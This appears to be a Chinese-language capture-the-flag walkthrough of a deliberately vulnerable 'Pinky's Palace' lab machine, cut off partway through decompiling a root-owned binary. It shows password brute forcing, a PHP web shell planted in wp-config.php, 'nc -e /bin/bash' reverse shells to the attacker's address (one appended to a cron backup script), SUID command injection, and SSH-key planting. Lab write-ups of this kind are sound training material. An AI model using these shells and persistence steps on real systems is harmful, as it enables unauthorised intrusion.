![\"image-20240226144951286\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747001.png\")
<\/div><\/p>\n\u6253\u5f00\u9776\u573a\u770b\u4e00\u4e0b\uff0c\u624b\u8d31\uff0c\u628a\u786c\u76d8\u5220\u6389\u4e86\u518d\u5220\u9664\u4e86\u3002\u3002\u3002\u3002<\/p>\n
![\"image-20240226151959375\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747003.png\")
<\/div><\/p>\n\u6b64\u65f6\u66f4\u65b0\u865a\u62df\u673a\u4e3a16.0\u6216\u8005\u91cd\u65b0\u5bfc\u5165\u5c31\u53ef\u4ee5\u4e86\uff1a<\/p>\n
![\"image-20240226152438229\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747004.png\")
<\/div><\/p>\n\u8fd9\u4e2a100G\u6709\u70b9\u552c\u4eba\u3002\u3002\u3002\u3002\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20240226152551399\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747005.png\")
<\/div><\/p>\n\u770b\u8d77\u6765ip\u6b63\u786e\uff01\uff01\uff01\uff01<\/p>\n
![\"image-20240226153314549\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402271747006.png\")
<\/div><\/p>\n\u626b\u5230\u4e86\uff0c\u653b\u51fb\u5f00\u59cb\uff01<\/p>\n
\u5148\u6309\u7167\u4f5c\u8005\u8981\u6c42\u7684\u5199\u4ee5\u4e0b\u4ee3\u7801\uff1a<\/p>\n
echo 192.168.244.131 pinkydb | sudo tee -a \/etc\/hosts\n# 192.168.244.131 pinkydb<\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b:<\/p>\n
![\"image-20240226154237183\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sS -sV -T4 -p- 192.168.244.131 <\/code><\/pre>\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-26 02:36 EST\nNmap scan report for 192.168.244.131\nHost is up (0.00023s latency).\nNot shown: 65531 closed tcp ports (reset)\nPORT STATE SERVICE VERSION\n80\/tcp open http Apache httpd 2.4.25 ((Debian))\n4655\/tcp filtered unknown\n7654\/tcp filtered unknown\n31337\/tcp filtered Elite\nMAC Address: 00:0C:29:4F:74:E9 (VMware)\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ . \nNmap done: 1 IP address (1 host up) scanned in 17.66 seconds <\/code><\/pre>\nWappalyzer<\/h3>\n
<\/div><\/p>\nWpscan<\/h3>\n
\u770b\u5230\u662fwordpress<\/code>\u7684CMS\uff0c\u5c1d\u8bd5\u8fdb\u884cWpscan<\/code>\u626b\u63cf\uff1a<\/p>\nwpscan --url http:\/\/192.168.244.131 --api-token=xxxxx<\/code><\/pre>\n<\/div><\/p>\n\u626b\u51fa\u4e86\u5f88\u591a\u7684\u6f0f\u6d1e\uff0c\u4f46\u662f\u6211\u4eec\u5148\u5c1d\u8bd5\u4e00\u4e0b\u5176\u4ed6\u7684\u529e\u6cd5\u3002<\/p>\n
\u518d\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u7528\u6237\uff1a<\/p>\n
wpscan --url http:\/\/pinkydb\/ --enumerate u<\/code><\/pre>\n<\/div><\/p>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u4eca\u5929\u6362\u4e00\u4e2a\u5de5\u5177fuff<\/code>\u8bd5\u8bd5\uff1a<\/p>\nffuf -u http:\/\/pinkydb\/FUZZ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt<\/code><\/pre>\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/pinkydb\/FUZZ\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n.hta [Status: 403, Size: 286, Words: 22, Lines: 12, Duration: 5ms]\n.htaccess [Status: 403, Size: 291, Words: 22, Lines: 12, Duration: 6ms]\n.htpasswd [Status: 403, Size: 291, Words: 22, Lines: 12, Duration: 150ms]\nsecret [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 0ms]\nserver-status [Status: 403, Size: 295, Words: 22, Lines: 12, Duration: 0ms]\nwordpress [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 0ms]\nwp-admin [Status: 301, Size: 305, Words: 20, Lines: 10, Duration: 0ms]\nwp-content [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 0ms]\nwp-includes [Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 0ms]\nxmlrpc.php [Status: 405, Size: 42, Words: 6, Lines: 1, Duration: 48ms]\nindex.php [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 7ms]\n:: Progress: [4723\/4723] :: Job [1\/1] :: 20 req\/sec :: Duration: [0:00:10] :: Errors: 0 ::<\/code><\/pre>\nNikto\u626b\u63cf<\/h3>\n
\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
nikto -h http:\/\/pinkydb<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.244.131\n+ Target Hostname: pinkydb\n+ Target Port: 80\n+ Start Time: 2024-02-26 03:31:04 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.25 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: Drupal Link header found with value: <http:\/\/pinkydb\/index.php?rest_route=\/>; rel="https:\/\/api.w.org\/". See: https:\/\/www.drupal.org\/\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ Apache\/2.4.25 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/: DEBUG HTTP verb may show server debugging information. See: https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017\n+ \/secret\/: Directory indexing found.\n+ \/secret\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.\n+ \/wordpress\/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.\n+ \/license.txt: License file found may identify site software.\n+ \/: A WordPress installation was found.\n+ \/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/wp-login.php: WordPress login found.\n+ 7851 requests: 0 error(s) and 16 item(s) reported on remote host\n+ End Time: 2024-02-26 03:31:23 (GMT-5) (19 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n\u7f51\u9875\u5206\u6790<\/h3>\n
\u5230\u5904\u70b9\u70b9\uff0c\u67e5\u770b\u5230\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u5148\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u76ee\u5f55<\/h3>\n
<\/div><\/p>\n\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
8890\n7000\n666\npinkydb<\/code><\/pre>\n\u7aef\u53e3Knock<\/h3>\n\n\u7aef\u53e3\u78b0\u649e\u662f\u4e00\u79cd\u901a\u8fc7\u5728\u4e00\u7ec4\u9884\u5148\u6307\u5b9a\u7684\u5173\u95ed\u7aef\u53e3\u4e0a\u4ea7\u751f\u8fde\u63a5\u8bf7\u6c42\uff0c\u4ece\u5916\u90e8\u6253\u5f00\u9632\u706b\u5899\u4e0a\u7684\u7aef\u53e3\u7684\u65b9\u6cd5<\/strong>\u3002\u4e00\u65e6\u6536\u5230\u6b63\u786e\u7684\u8fde\u63a5\u8bf7\u6c42\u5e8f\u5217\uff0c\u9632\u706b\u5899\u89c4\u5219\u5c31\u4f1a\u88ab\u52a8\u6001\u4fee\u6539\uff0c\u4ee5\u5141\u8bb8\u53d1\u9001\u8fde\u63a5\u8bf7\u6c42\u7684\u4e3b\u673a\u901a\u8fc7\u7279\u5b9a\u7aef\u53e3<\/strong>\u8fdb\u884c\u8fde\u63a5\u3002<\/p>\n\u7aef\u53e3\u78b0\u649e\u7684\u4e3b\u8981\u76ee\u7684\u662f\u9632\u6b62\u653b\u51fb\u8005\u901a\u8fc7\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\u6765\u626b\u63cf\u7cfb\u7edf\u4e2d\u6f5c\u5728\u7684\u53ef\u5229\u7528\u670d\u52a1\uff0c\u56e0\u4e3a\u9664\u975e\u653b\u51fb\u8005\u53d1\u9001\u6b63\u786e\u7684\u78b0\u649e\u5e8f\u5217\uff0c\u5426\u5219\u53d7\u4fdd\u62a4\u7684\u7aef\u53e3\u5c06\u663e\u793a\u4e3a\u5173\u95ed\u3002<\/p>\n
\u4f8b\u5982\u5728\u670d\u52a1\u5668\u4e0a\u8bbe\u7f6e\u4e3a\uff1a\u670d\u52a1\u5668\u63a5\u6536\u5230\u540c\u4e00\u4e2a\u7528\u6237\u7684\u5bf9\u7aef\u53e32048\u30012049\u30012055\u30012058\u8fde\u63a5\u5e8f\u5217\u5c1d\u8bd5\u540e\uff0c\u5219\u670d\u52a1\u5668\u6253\u5f00TCP\u670d\u52a1\u7aef\u53e3\u53f728\uff0c\u8be5\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u8be5\u7aef\u53e3\u8fdb\u884c\u8fdc\u7a0b\u5de5\u4f5c\uff0c\u8fde\u63a5\u7ed3\u675f\u540e\u81ea\u52a8\u5173\u95ed\u8be5\u670d\u52a1\u7aef\u53e3\u3002<\/p>\n<\/blockquote>\n
\u770b\u4e0a\u53bb\u662f\u7aef\u53e3\uff0c\u4f46\u662f\u524d\u9762\u6ca1\u6709\u626b\u51fa\u6765\uff0c\u5c1d\u8bd5Knock<\/code>\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\nfor port in {8890,7000,666}; do nc -vz pinkydb $port; done\npinkydb [192.168.244.131] 8890 (?) : Connection refused\npinkydb [192.168.244.131] 7000 (bbs) : Connection refused\npinkydb [192.168.244.131] 666 (?) : Connection refused<\/code><\/pre>\n\u5c1d\u8bd5\u91cd\u65b0\u8fdb\u884c\u626b\u63cf\u4e00\u4e0b\uff0c\u89c2\u5bdf\u662f\u5426\u6709\u9057\u6f0f\u7684\uff1a<\/p>\n
rustscan -a pinkydb<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u4e0d\u540c\u7684\u7aef\u53e3\u987a\u5e8f\u8fdb\u884cknock\uff1a<\/p>\n
for port in {7000,8890,666}; do nc -vz pinkydb $port; done\nfor port in {7000,666,8890}; do nc -vz pinkydb $port; done<\/code><\/pre>\n\u8fd9\u65f6\u5019\u5c31\u53ef\u4ee5\u626b\u5230\u5176\u4ed6\u7684\u7aef\u53e3\u4e86\uff01\uff01\uff01<\/p>\n
<\/div><\/p>\n\u8fd9\u65f6\u5019nmap\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\u76f8\u5173\u7aef\u53e3\u5f00\u653e\u670d\u52a1\u7684\u7248\u672c\u3002<\/p>\n
sudo nmap -p 4655,7654,31337 -sV pinkydb<\/code><\/pre>\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u4e00\u4e2a\u672a\u77e5\u670d\u52a1\uff0c\u8fd0\u884c\u572831337<\/code>\u7aef\u53e3\uff1a<\/p>\n\n31337\u7aef\u53e3\u662fmeterpreter \u7684bindshell\u65b9\u5f0f\u7ecf\u5e38\u4f7f\u7528\u7684\u7aef\u53e3\uff0cnc\u5728\u6d4b\u8bd5\u65f6\u5019\u4f1a\u5411\u8fd9\u4e2a\u7aef\u53e3\u53d1\u9001\u8bf7\u6c42\uff0c\u8fd9\u4e2a\u7a0b\u5e8f\u4f1a\u56de\u663e\u8f93\u5165\u7684\u5b57\u7b26\u540e\u5173\u95ed\u8fde\u63a5\uff0c\u4e0d\u6392\u9664\u5b58\u5728\u6ea2\u51fa\u7684\u53ef\u80fd\u3002<\/p>\n<\/blockquote>\n
\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
nc pinkydb 31337<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e00\u4e2a\u6253\u5370\u5b57\u7b26\u4e32\u7684\u7a0b\u5e8f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc pinkydb 31337\n[+] Welcome to The Daemon [+]\nThis is soon to be our backdoor\ninto Pinky's Palace.\n=> a \na \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc pinkydb 31337\n[+] Welcome to The Daemon [+]\nThis is soon to be our backdoor\ninto Pinky's Palace.\n=> aaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaa<\/code><\/pre>\n\u53ef\u80fd\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u968f\u4fbf\u53d1\u9001\u4e00\u4e0b\uff0c\u770b\u770b\u4f1a\u4e0d\u4f1a\u5d29\u6e83\uff1a<\/p>\n
python -c "print('X'*1024)" | nc pinkydb 31337\n\n[+] Welcome to The Daemon [+]\nThis is soon to be our backdoor\ninto Pinky's Palace.\n=> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\nH <\/code><\/pre>\n\u53ef\u80fd\u7b49\u4f1a\u8981\u7528\u7684\u3002<\/p>\n
7654<\/h3>\n
\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7f51\u7ad9\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\u4e07\u80fd\u5bc6\u7801\uff0c\u5931\u8d25\uff0c\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
admin\nroot\npinky\npinky1337<\/code><\/pre>\ncewl<\/code> \u751f\u6210\u5355\u8bcd\u5217\u8868\u4f5c\u4e3a\u5bc6\u7801\u5b57\u5178 pass.txt<\/code>\uff1a<\/p>\ncewl -d 1 -w pass.txt http:\/\/pinkydb\n# CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https:\/\/digi.ninja\/)\nwc -l pass.txt && head pass.txt\n# wc -l \/tmp\/words.txt \u547d\u4ee4\u7528\u4e8e\u7edf\u8ba1\u6587\u4ef6 \/tmp\/words.txt \u4e2d\u7684\u884c\u6570\u3002\u800c head \/tmp\/words.txt \u547d\u4ee4\u5219\u7528\u4e8e\u663e\u793a\u6587\u4ef6 \/tmp\/words.txt \u7684\u5f00\u5934\u90e8\u5206\uff0c\u9ed8\u8ba4\u663e\u793a\u524d 10 \u884c\u3002\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7ed3\u5408\u8d77\u6765\uff0c\u5148\u7edf\u8ba1\u884c\u6570\uff0c\u7136\u540e\u663e\u793a\u6587\u4ef6\u7684\u524d\u51e0\u884c\u3002\n# 161 pass.txt\n# Pinky\n# WordPress\n# Blog\n# site\n# content\n# entry\n# Hello\n# world\n# Comments\n# March<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
sudo hydra -L user.txt -P pass.txt -s 7654 pinkydb http-post-form '\/login.php:user=^USER^&pass=^PASS^:Invalid'<\/code><\/pre>\n<\/div><\/p>\n\u7206\u7834\u51fa\u6765\u4e00\u4e2a\u8d26\u53f7\u5bc6\u7801\u3002<\/p>\n
\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
pinky\nPassione<\/code><\/pre>\n\u767b\u5f55\u641c\u96c6\u4fe1\u606f<\/h3>\n
<\/div><\/p>\n- Stefano\n- Intern Web developer\n- Created RSA key for security for him to login<\/code><\/pre>\n\u7ed9\u4e86\u4e00\u4e2assh\u8fde\u63a5\u6587\u4ef6\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u4f7f\u7528ssh2john<\/code>\u63d0\u53d6hash\u503c\uff1a<\/p>\nssh2john id_rsa > secret_rsa<\/code><\/pre>\n\u4f7f\u7528john<\/code>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt secret_rsa<\/code><\/pre>\n<\/div><\/p>\nssh\u767b\u5f55<\/h3>\nchmod 600 id_rsa\nssh -l stefano -i id_rsa -p4655 pinkydb<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n
\u770b\u4e00\u4e0b\u76ee\u5f55\u7ed3\u6784\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6709\u610f\u601d\u7684\u4e1c\u897f\uff1a<\/p>\n
<\/div><\/p>\n\u73b0\u5728\u6682\u65f6\u65e0\u4ece\u4e0b\u624b\uff0c\u770b\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6<\/p>\n
# \/var\/www\/html \u67e5\u770b\u4e00\u4e0b\u53ef\u5199\u6587\u4ef6\nfind . -writable\n# .\/apache\/wp-config.php<\/code><\/pre>\n\u5199\u4e00\u4e2a\u9a6c\u8bd5\u8bd5\uff1a<\/p>\n
<?php system($_GET["cmd"]);?<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n\u53d1\u73b0\u6709nc\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5411\u8fde\u63a5\uff1a<\/p>\n
nc -e \/bin\/bash 192.168.244.128 1234\n# kali\nnc -lvvp 1234<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u5f97\u5230\u4e86shell \uff01\uff01\uff01<\/p>\n
\u4e0b\u8f7d\u63d0\u6743\u6587\u4ef6<\/h3>\n# Stefano\ncd \/home\/stefano\/tools\npython -m SimpleHTTPServer 8888<\/code><\/pre>\n<\/div><\/p>\n\u4f7f\u7528\u521a\u521a\u5f97\u5230\u7684shell\uff0c\u770b\u4e0a\u53bb\u611f\u89c9\u4e0d\u662f\u5f88\u597d\u7528\uff0c\u5c1d\u8bd5\u6269\u5c55\u6210\u597d\u7528\u7684shell\uff1a<\/p>\n
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n<\/div><\/p>\n\u5207\u6362\u5230pinky\u7528\u6237<\/h3>\n
\u4e0b\u8f7d\u5230\u672c\u5730\u4ee5\u540eIDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n char *v3; \/\/ rsi\n __int64 v4; \/\/ rsi\n __int64 v6; \/\/ [rsp+0h] [rbp-60h]\n char s; \/\/ [rsp+10h] [rbp-50h]\n __uid_t ruid; \/\/ [rsp+50h] [rbp-10h]\n __gid_t rgid; \/\/ [rsp+54h] [rbp-Ch]\n char *s2; \/\/ [rsp+58h] [rbp-8h]\n\n if ( argc <= 1 )\n {\n printf("%s <Message>\\n", *argv, envp, argv);\n exit(0);\n }\n s2 = getenv("TERM");\n printf("[+] Input Password: ", argv);\n __isoc99_scanf("%s", &s);\n if ( strlen(&s) > 0x28 )\n {\n puts("Bad hacker! Go away!");\n exit(0);\n }\n v3 = s2;\n if ( strcmp(&s, s2) )\n {\n puts("[!] Incorrect Password!");\n exit(0);\n }\n printf("[+] Welcome to Question Submit!", v3);\n rgid = getegid();\n ruid = geteuid();\n setresgid(rgid, rgid, rgid);\n v4 = ruid;\n setresuid(ruid, ruid, ruid);\n send(*(_QWORD *)(v6 + 8), v4);\n return 0;\n}<\/code><\/pre>\n\u8981\u6c42\u8f93\u5165\u5bc6\u7801\uff0c\u5c06\u5176\u4e0eTERM<\/code>\u73af\u5883\u53d8\u91cf\u8fdb\u884c\u6bd4\u8f83\uff0c\u5982\u679c\u5339\u914d\uff0c\u5219\u5c06\u7b2c\u4e00\u4e2a\u7a0b\u5e8f\u53c2\u6570 ( argv[1]<\/code>) \u4f20\u9012\u7ed9\u8be5send<\/code>\u51fd\u6570<\/p>\n\/\/seed\nint __fastcall send(__int64 a1)\n{\n char *ptr; \/\/ [rsp+18h] [rbp-8h]\n\n asprintf(&ptr, "\/bin\/echo %s >> \/home\/pinky\/messages\/stefano_msg.txt", a1);\n return system(ptr);\n}<\/code><\/pre>\n\u57fa\u672c\u5206\u6790\u8868\u660e\uff0c\u8be5\u51fd\u6570\u53ea\u662f\u5c06\u6211\u4eec\u7684\u6d88\u606f\u6ce8\u5165\u5230\u683c\u5f0f\u5b57\u7b26\u4e32\u4e2d"\/bin\/echo %s >> \/home\/pinky\/messages\/stefano_msg.txt"<\/code>\uff0c\u5e76\u5c06\u7ed3\u679c\u5b57\u7b26\u4e32\u53d1\u9001\u5230\u8be5system<\/code>\u51fd\u6570\u3002\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<\/div><\/p>\n\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u867d\u7136\u6709\u4e86pinky<\/code>\u7684shell<\/code>\uff0c\u4f46\u662f\u8fd8\u662f\u5c5e\u4e8estefano<\/code>\u7528\u6237\u7ec4\uff0c\u8fd9\u662f\u56e0\u4e3a\uff1asuid bit<\/code> \u5176\u5b9e\u8bbe\u7f6e\u7684\u662feuid<\/code>\uff0c\u4e0d\u662fuid<\/code>\u3002<\/p>\n\u6240\u4ee5\u6211\u4eec\u8981\u5207\u6362\u5230pinky<\/code>\u7684shell\uff0c\u6700\u7b80\u5355\u7684\u65b9\u5f0f\u5c31\u662f\u901a\u8fc7ssh\u8fdb\u884c\u8fde\u63a5\u3002<\/p>\n# pinky\ncd \/home\/pinky\/\nmkdir .ssh\ncd .ssh\ntouch authorized_keys\necho [SSH_PUBLIC_KEY] > \/home\/pinky\/.ssh\/authorized_keys\n# kali\nssh -l pinky pinkydb -p 4655<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u4ee5\u53d1\u73b0\u5df2\u7ecf\u5207\u6362\u8fc7\u6765\u4e86\uff01\uff01<\/p>\n
\u5b9a\u65f6\u4efb\u52a1\u9003\u9038\u5230demon\u7528\u6237<\/h3>\n
\u67e5\u627e\u4e00\u4e0b\u53ef\u5199\u6587\u4ef6\uff1a<\/p>\n
2>\/dev\/null find \/ -writable | grep -Ev '\/proc|\/sys|\/run'<\/code><\/pre>\n\u53d1\u73b0\u4e00\u4e2a\/usr\/local\/bin\/backup.sh<\/code>\u6587\u4ef6\uff0c\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\ncat \/usr\/local\/bin\/backup.sh<\/code><\/pre>\n#!\/bin\/bash\n\nrm \/home\/demon\/backups\/backup.tar.gz\ntar cvzf \/home\/demon\/backups\/backup.tar.gz \/var\/www\/html\n#\n#\n#<\/code><\/pre>\n\u770b\u4e0a\u53bb\u662f\u4e00\u4e2a\u5907\u4efd\u7684\u6587\u4ef6\uff0c\u53ef\u80fd\u5b58\u5728\u5b9a\u65f6\u4efb\u52a1\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5199\u5165\u5229\u7528\uff1a<\/p>\n
# add to \/usr\/local\/bin\/backup.sh\nnc -e \/bin\/bash 192.168.244.128 2345<\/code><\/pre>\n# kali\nnc -lvnp 2345<\/code><\/pre>\n\u7b49\u4e00\u4e0b\uff0c\u7b49\u4ed6\u6267\u884c\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n
<\/div><\/p>\nok\uff0c\u83b7\u5f97\u4e86demon<\/code>\u7528\u6237\u3002<\/p>\n\u83b7\u53d6\u6587\u4ef6<\/h3>\n
\u5207\u6362\u5230\u65b9\u4fbf\u4e00\u5b9a\u7684shell<\/code>\uff1a<\/p>\npython -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n\u641c\u7d22\u53ef\u5229\u7528\u6587\u4ef6\uff1a<\/p>\n
2>\/dev\/null find \/ -user demon | grep -Ev '\/proc|\/sys|\/user'<\/code><\/pre>\n<\/div><\/p>\n\u770b\u5230\u4e00\u4e2a\u6709\u610f\u601d\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cd \/daemon;ps -ef | grep panel<\/code><\/pre>\nroot 463 1 0 02:21 ? 00:00:00 \/daemon\/panel\nroot 1545 463 0 04:38 ? 00:00:00 \/daemon\/panel\ndemon 15409 15313 0 08:12 pts\/0 00:00:00 grep panel<\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230\u662froot<\/code>\u6743\u9650\uff01\uff01\uff01<\/p>\n\u4f20\u8fc7\u6765\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n
# kali\nnc -lvnp 3456 > panel\n# demon\nnc 192.168.244.128 3456 < panel<\/code><\/pre>\npanel\u6587\u4ef6\u5206\u6790<\/h3>\n
IDA<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\u76f8\u5173\u51fd\u6570\u903b\u8f91\uff1a<\/p>\nint __cdecl __noreturn main(int argc, const char **argv, const char **envp)\n{\n char buf; \/\/ [rsp+0h] [rbp-1050h]\n socklen_t addr_len; \/\/ [rsp+100Ch] [rbp-44h]\n struct sockaddr v5; \/\/ [rsp+1010h] [rbp-40h]\n struct sockaddr addr; \/\/ [rsp+1020h] [rbp-30h]\n int optval; \/\/ [rsp+103Ch] [rbp-14h]\n int v8; \/\/ [rsp+1040h] [rbp-10h]\n int fd; \/\/ [rsp+1044h] [rbp-Ch]\n int v10; \/\/ [rsp+1048h] [rbp-8h]\n __pid_t v11; \/\/ [rsp+104Ch] [rbp-4h]\n\n while ( 1 )\n {\n v11 = fork();\n if ( !v11 )\n break;\n wait(0LL);\n }\n v10 = 1;\n optval = 1;\n fd = socket(2, 1, 0);\n if ( fd == -1 )\n fatal("[-] Fail in socket", 1LL);\n if ( setsockopt(fd, 1, 2, &optval, 4u) == -1 )\n fatal("setting sock options", 1LL);\n addr.sa_family = 2;\n *(_WORD *)addr.sa_data = htons(0x7A69u);\n *(_DWORD *)&addr.sa_data[2] = 0;\n memset(&addr.sa_data[6], 0, 8uLL);\n if ( 